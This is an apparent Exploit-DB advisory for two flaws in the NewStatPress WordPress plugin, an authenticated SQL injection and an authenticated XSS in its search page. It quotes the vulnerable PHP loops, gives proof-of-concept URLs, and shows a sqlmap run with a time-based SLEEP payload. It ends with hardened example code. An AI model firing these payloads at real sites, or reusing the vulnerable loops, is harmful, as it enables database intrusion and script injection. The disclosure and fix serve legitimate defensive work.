vendor:
NewStatPress
by:
Adrián M. F.
7.5
CVSS
HIGH
Authenticated SQLi, Authenticated XSS
89, 79
CWE
Product Name: NewStatPress
Affected Version From: 2000.9.8
Affected Version To: 2000.9.9
Patch Exists: YES
Related CWE: CVE-2015-4062, CVE-2015-4063
CPE: a:wordpress:newstatpress
Metasploit:
Other Scripts:
Tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm
CVSS Metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N
Nuclei Metadata: {'max-request': 2, 'verified': True, 'framework': 'wordpress', 'vendor': 'newstatpress_project', 'product': 'newstatpress'}
Platforms Tested:
2015

Multiple vulnerabilities in WordPress plugin “NewStatPress”

The WordPress plugin "NewStatPress" (version 0.9.8) is vulnerable to an authenticated SQL injection (CVE-2015-4062) and an authenticated cross-site scripting issue (CVE-2015-4063). Both flaws are in the plugin's search page (admin.php?page=nsp_search): the "where1" parameter is concatenated unescaped into a SQL LIKE clause and is also echoed unescaped into the results table header, so any authenticated user who can reach that page can exploit either.

Mitigation:

Update to version 0.9.9 of the plugin.

Exploit-DB raw data:

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063

Vulnerabilities (2)
===================

(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------

* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------

* CODE:
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search


Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.
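The two snippets quoted from includes/nsp_search.php above share one root cause: a request parameter that names a column is used verbatim both as a SQL identifier and as HTML text. The following is an added example written for this page, not code from the NewStatPress plugin, the fix release, or the advisory author. It shows the hardened shape of the same loop in plain PHP: the column name is checked against a fixed allow-list (identifiers cannot be bound as query parameters, so a whitelist is the only option), the search value is bound as a parameter with LIKE wildcards escaped, and the header label is HTML-escaped before output. The column names in `ALLOWED_COLUMNS` and the sample request are constructed for the example; the real plugin's schema is not part of the advisory.

```php
<?php
// Added example, not code from the NewStatPress plugin or the advisory.
// Hardened counterpart of the two nsp_search.php snippets quoted above.
// Column names below are constructed for the example (assumption).
const ALLOWED_COLUMNS = ['agent', 'ip', 'urlrequested', 'referrer'];

/**
 * Build the WHERE fragment for up to three where/what pairs.
 * Returns ['sql' => string, 'params' => array] for use with a prepared
 * statement ("?" placeholders here; $wpdb->prepare('%s') in WordPress).
 */
function build_search_where(array $query): array
{
    $sql = '';
    $params = [];
    for ($i = 1; $i <= 3; $i++) {
        $column = $query["where$i"] ?? '';
        $value  = $query["what$i"] ?? '';
        if ($column === '' || $value === '') {
            continue;
        }
        // An identifier cannot be a bound parameter, so the only safe option
        // is an exact match against a fixed allow-list; anything else is dropped.
        if (!in_array($column, ALLOWED_COLUMNS, true)) {
            continue;
        }
        // Escape LIKE metacharacters so a user-supplied "%" or "_" matches
        // literally instead of widening the search.
        $escaped = addcslashes($value, '\\%_');
        $sql .= " AND `$column` LIKE ?";
        $params[] = "%$escaped%";
    }
    return ['sql' => $sql, 'params' => $params];
}

/**
 * Render the table header cells, escaping the label for HTML context.
 * (esc_html() is the WordPress equivalent of htmlspecialchars() here.)
 * The allow-list check is repeated so a rejected column never reaches output.
 */
function render_search_headers(array $query): string
{
    $html = '';
    for ($i = 1; $i <= 3; $i++) {
        $column = $query["where$i"] ?? '';
        if ($column === '' || !in_array($column, ALLOWED_COLUMNS, true)) {
            continue;
        }
        $label = htmlspecialchars(ucfirst($column), ENT_QUOTES, 'UTF-8');
        $html .= "<th scope='col'>$label</th>";
    }
    return $html;
}

// Constructed request: where1 carries a non-column string of the kind the
// advisory's PoC uses, where2 is a legitimate column whose value contains a
// LIKE wildcard. Only the allow-listed pair reaches the query and the header.
$request = [
    'where1' => 'agent AND 1=1',
    'what1'  => 'Mozilla',
    'where2' => 'ip',
    'what2'  => '10.0.%',
];

$where = build_search_where($request);
echo "SQL fragment: {$where['sql']}\n";
echo "Bound params: " . json_encode($where['params']) . "\n";
echo "Headers: " . render_search_headers($request) . "\n";
```

Run with `php` on the command line; the fragment contains only the `ip` condition with a `?` placeholder, the bound value is `%10.0.\%%` (the user's `%` escaped so it matches literally), and the header row contains a single escaped `<th>` for `Ip`. In the plugin's own context the same structure would use `$wpdb->prepare()` with `%s` and `$wpdb->esc_like()` for the value, and `esc_html()` for the label.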